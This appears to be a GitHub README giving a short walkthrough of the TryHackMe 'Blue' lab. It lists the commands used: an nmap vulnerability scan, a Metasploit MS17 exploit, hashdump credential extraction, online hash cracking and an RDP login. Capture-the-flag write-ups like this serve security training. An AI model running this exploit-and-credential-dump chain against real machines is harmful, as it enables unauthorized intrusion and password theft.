Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

TryHackMe-Blue

This document outlines the steps to successfully complete the TryHackMe Blue room.

Summary of Steps

  1. Vulnerability Scan: Identify potential vulnerabilities on the target machine.
  2. Use Exploit: Leverage an exploit to gain initial access.
  3. Get Password Hash: Extract password hashes from the compromised system.
  4. Get Password: Crack the obtained password hashes.
  5. Login: Use the cracked credentials to log in to the target machine.

5 Steps to Hack the TryHackMe Blue Room

  • Vulnerability Scan​
    nmap --script vuln -T5 TARGET_IP
  • Use Exploit​
    msfconsole
    search ms17
    use 0
    options
    set rhost TARGET_IP
    run
  • Get Password Hash​
    hashdump
  • Get Password​
    # Use a service like hashes.com
    
  • Login
    xfreerdp /u:username /p:"password" /v:AttackBoxIP ​

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors